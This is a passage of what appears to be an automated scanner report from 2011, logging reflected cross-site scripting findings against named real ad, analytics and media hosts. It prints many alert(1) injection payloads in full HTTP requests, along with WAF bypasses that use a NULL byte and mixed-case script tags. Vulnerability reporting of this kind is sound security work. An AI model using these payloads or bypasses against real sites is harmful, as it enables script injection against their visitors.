The value of the anId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ffc03"-alert(1)-"906cc52802e was submitted in the anId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jspix?anId=140ffc03"-alert(1)-"906cc52802e&pubId=6168&campId=3025 HTTP/1.1 Host: pixel.adsafeprotected.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://web.adblade.com/imps.php?app=3025&ad_width=300&ad_height=250&title_font=1&title_color=0066cc&description_font=1&description_color=000000&id=51&output=html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=877FABA4B1221481803F1D8A0391E2BC; Path=/ Content-Type: text/javascript Date: Wed, 05 Oct 2011 21:19:58 GMT Connection: close
The value of the campId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64f6a"-alert(1)-"f53e589e32f was submitted in the campId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jspix?anId=140&pubId=6168&campId=302564f6a"-alert(1)-"f53e589e32f HTTP/1.1 Host: pixel.adsafeprotected.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://web.adblade.com/imps.php?app=3025&ad_width=300&ad_height=250&title_font=1&title_color=0066cc&description_font=1&description_color=000000&id=51&output=html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=ED2A9A00B0635D0818FEA5B1C105438E; Path=/ Content-Type: text/javascript Date: Wed, 05 Oct 2011 21:19:58 GMT Connection: close
3.269. http://pixel.adsafeprotected.com/jspix [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://pixel.adsafeprotected.com
Path:
/jspix
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bc360"-alert(1)-"2839ac6144e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jspix?anId=140&pubId=6168&campId=3025&bc360"-alert(1)-"2839ac6144e=1 HTTP/1.1 Host: pixel.adsafeprotected.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://web.adblade.com/imps.php?app=3025&ad_width=300&ad_height=250&title_font=1&title_color=0066cc&description_font=1&description_color=000000&id=51&output=html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=4D4BE6BBFF8B7625F0E8DB6EB158D4FA; Path=/ Content-Type: text/javascript Date: Wed, 05 Oct 2011 21:19:59 GMT Connection: close
The value of the pubId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ab3e"-alert(1)-"8d006e7688f was submitted in the pubId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jspix?anId=140&pubId=61684ab3e"-alert(1)-"8d006e7688f&campId=3025 HTTP/1.1 Host: pixel.adsafeprotected.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://web.adblade.com/imps.php?app=3025&ad_width=300&ad_height=250&title_font=1&title_color=0066cc&description_font=1&description_color=000000&id=51&output=html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=2F77EF5FF064A9BE7F6A40D8B97EA651; Path=/ Content-Type: text/javascript Date: Wed, 05 Oct 2011 21:19:58 GMT Connection: close
The value of the login request parameter is copied into the HTML document as plain text between tags. The payload 3839d<script>alert(1)</script>49b8604408f1ce987 was submitted in the login parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56370"><script>alert(1)</script>a9c28bed045 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:20:37 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 339 Content-Type: text/html
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99558"><script>alert(1)</script>c7bc1f0d065 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:20:43 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 331 Content-Type: text/html
The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload a3858<script>alert(1)</script>41a688897f2 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload d5ef7<script>alert(1)</script>c58f1561374 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload %00ff4f0<a>25adf63a7a9 was submitted in the REST URL parameter 1. This input was echoed as ff4f0<a>25adf63a7a9 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /content.select%00ff4f0<a>25adf63a7a9?format=SMIL&Tracking=true&balance=true&MBR=true&pid=qRnXc3QVK_ZOBWEeKVKLtxwVV_4Zq234 HTTP/1.1 Host: release.theplatform.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://www.cbs.com/thunder/canplayer/canplayer.swf Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Wed, 05 Oct 2011 18:38:31 GMT Content-Type: text/html; charset=iso-8859-1 Cache-Control: must-revalidate,no-cache,no-store Content-Length: 1401 Server: Jetty(6.1.19)
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload %0073cd5<ScRiPt>alert(1)</ScRiPt>1a9c34bf6da was submitted in the REST URL parameter 1. This input was echoed as 73cd5<ScRiPt>alert(1)</ScRiPt>1a9c34bf6da in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5ccb6<a>3a2884750d9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload %0062c77<script>alert(1)</script>54870b7b819 was submitted in the REST URL parameter 1. This input was echoed as 62c77<script>alert(1)</script>54870b7b819 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload aaa2c<ScRiPt>alert(1)</ScRiPt>6d226888d75 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /crossdomain.xmlaaa2c<ScRiPt>alert(1)</ScRiPt>6d226888d75 HTTP/1.1 Host: release.theplatform.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://www.cbs.com/thunder/canplayer/canplayer.swf Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Wed, 05 Oct 2011 18:38:29 GMT Content-Type: text/html; charset=iso-8859-1 Cache-Control: must-revalidate,no-cache,no-store Content-Length: 1421 Server: Jetty(6.1.19)
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload dce12<a>28d723c88c5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /favicon.icodce12<a>28d723c88c5 HTTP/1.1 Host: release.theplatform.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive
Response
HTTP/1.1 404 Not Found Date: Wed, 05 Oct 2011 19:14:28 GMT Content-Type: text/html; charset=iso-8859-1 Cache-Control: must-revalidate,no-cache,no-store Content-Length: 1395 Server: Jetty(6.1.19)
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload %00d3373<script>alert(1)</script>27542a50eb4 was submitted in the REST URL parameter 1. This input was echoed as d3373<script>alert(1)</script>27542a50eb4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7a3cb'%3balert(1)//1e6062acf11 was submitted in the site parameter. This input was echoed as 7a3cb';alert(1)//1e6062acf11 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /js/counter.asp?site=s15fredwilson7a3cb'%3balert(1)//1e6062acf11 HTTP/1.1 Host: s15.sitemeter.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://www.avc.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 05 Oct 2011 21:21:17 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Content-Length: 7322 Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 21:31:17 GMT Cache-control: private
The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a684'%3balert(1)//f0b22c1394d was submitted in the site parameter. This input was echoed as 8a684';alert(1)//f0b22c1394d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /js/counter.js?site=s15fredwilson8a684'%3balert(1)//f0b22c1394d HTTP/1.1 Host: s15.sitemeter.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://www.avc.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response (redirected)
HTTP/1.1 200 OK Connection: close Date: Wed, 05 Oct 2011 21:21:18 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Content-Length: 7322 Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 21:31:18 GMT Cache-control: private
The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1bc30'%3balert(1)//38724323fd0 was submitted in the site parameter. This input was echoed as 1bc30';alert(1)//38724323fd0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /js/counter.asp?site=s20mpgames1bc30'%3balert(1)//38724323fd0 HTTP/1.1 Host: s20.sitemeter.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://www.multiplayergames.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 05 Oct 2011 20:47:20 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Content-Length: 7316 Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 20:57:20 GMT Cache-control: private
The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e0942'%3balert(1)//34a5bee28aa was submitted in the site parameter. This input was echoed as e0942';alert(1)//34a5bee28aa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /js/counter.js?site=s20mpgamese0942'%3balert(1)//34a5bee28aa HTTP/1.1 Host: s20.sitemeter.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://www.multiplayergames.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response (redirected)
HTTP/1.1 200 OK Connection: close Date: Wed, 05 Oct 2011 20:47:20 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Content-Length: 7316 Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 20:57:20 GMT Cache-control: private
The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload caa64'%3balert(1)//45576009749 was submitted in the site parameter. This input was echoed as caa64';alert(1)//45576009749 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /js/counter.asp?site=s23marketingfmcaa64'%3balert(1)//45576009749 HTTP/1.1 Host: s23.sitemeter.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://www.marketing.fm/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 05 Oct 2011 20:44:49 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Content-Length: 7324 Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 20:54:49 GMT Cache-control: private
The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da31d'%3balert(1)//e6c23cdc14e was submitted in the site parameter. This input was echoed as da31d';alert(1)//e6c23cdc14e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /js/counter.js?site=s23marketingfmda31d'%3balert(1)//e6c23cdc14e HTTP/1.1 Host: s23.sitemeter.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://www.marketing.fm/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response (redirected)
HTTP/1.1 200 OK Connection: close Date: Wed, 05 Oct 2011 20:44:50 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Content-Length: 7324 Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 20:54:50 GMT Cache-control: private
The value of the frameName request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79c1c'-alert(1)-'b03d887bafc was submitted in the frameName parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the pageURL request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60f77'-alert(1)-'87dd1a3316c was submitted in the pageURL parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the ranreq request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86a3e'-alert(1)-'ceb4780479b was submitted in the ranreq parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the api_key request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e211"><script>alert(1)</script>33a4e9798da was submitted in the api_key parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tools/geotagger/infowindow.php?api_key=nbc3e211"><script>alert(1)</script>33a4e9798da&is_admin=0&target_url=http%3A%2F%2Fwww.nbcnewyork.com%2Fnews%2Flocal%2FHelicopter-Crash-East-River-Death-Tourist-Rescue-Victims-Bloomberg--131125518.html HTTP/1.1 Host: sl5.cdn.fwix.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.nbcnewyork.com/news/local/Helicopter-Crash-East-River-Death-Tourist-Rescue-Victims-Bloomberg--131125518.html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.0 200 OK Date: Wed, 05 Oct 2011 18:21:14 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.5 Cache-Control: max-age=3600 Pragma: Vary: Accept-Encoding Content-Type: text/html Content-Length: 5331 X-Cache: MISS from cdce-sje008-001.sje008.internap.com X-Cache: MISS from cdce-sje008-001.sje008.internap.com Via: 1.1 cdce-sje008-001.sje008.internap.com:1080 (squid/2.7.STABLE7), 1.0 cdce-sje008-001.sje008.internap.com:80 (squid/2.7.STABLE7) Connection: keep-alive
3.293. http://sl5.cdn.fwix.com/tools/geotagger/infowindow.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://sl5.cdn.fwix.com
Path:
/tools/geotagger/infowindow.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6837c"><script>alert(1)</script>d4850ec17cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tools/geotagger/infowindow.php?api_key=nbc&is_admin=0&target_url=http%3A%2F%2Fwww.nbcnewyork.com%2Fnews%2Flocal%2FHelicopter-Crash-East-River-Death-Tourist-Rescue-Victims-Bloomberg--131125518./6837c"><script>alert(1)</script>d4850ec17cdhtml HTTP/1.1 Host: sl5.cdn.fwix.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.nbcnewyork.com/news/local/Helicopter-Crash-East-River-Death-Tourist-Rescue-Victims-Bloomberg--131125518.html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.0 200 OK Date: Wed, 05 Oct 2011 18:21:39 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.5 Cache-Control: max-age=30 Pragma: Vary: Accept-Encoding Content-Type: text/html Content-Length: 1793 X-Cache: MISS from cdce-sje008-005.sje008.internap.com X-Cache: MISS from cdce-sje008-006.sje008.internap.com Via: 1.1 cdce-sje008-005.sje008.internap.com:1080 (squid/2.7.STABLE7), 1.0 cdce-sje008-006.sje008.internap.com:80 (squid/2.7.STABLE7) Connection: keep-alive
The value of the target_url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74147"><script>alert(1)</script>ed76cccb98e was submitted in the target_url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tools/geotagger/infowindow.php?api_key=nbc&is_admin=0&target_url=http%3A%2F%2Fwww.nbcnewyork.com%2Fnews%2Flocal%2FHelicopter-Crash-East-River-Death-Tourist-Rescue-Victims-Bloomberg--131125518.html74147"><script>alert(1)</script>ed76cccb98e HTTP/1.1 Host: sl5.cdn.fwix.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.nbcnewyork.com/news/local/Helicopter-Crash-East-River-Death-Tourist-Rescue-Victims-Bloomberg--131125518.html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.0 200 OK Date: Wed, 05 Oct 2011 18:21:27 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.5 Cache-Control: max-age=30 Pragma: Vary: Accept-Encoding Content-Type: text/html Content-Length: 1792 X-Cache: MISS from cdce-sje008-010.sje008.internap.com X-Cache: MISS from cdce-sje008-010.sje008.internap.com Via: 1.1 cdce-sje008-010.sje008.internap.com:1081 (squid/2.7.STABLE7), 1.0 cdce-sje008-010.sje008.internap.com:80 (squid/2.7.STABLE7) Connection: keep-alive
The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4e604'%3balert(1)//fd1f6c552cc was submitted in the site parameter. This input was echoed as 4e604';alert(1)//fd1f6c552cc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /js/counter.asp?site=sm8doblu4e604'%3balert(1)//fd1f6c552cc HTTP/1.1 Host: sm8.sitemeter.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://www.doblu.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
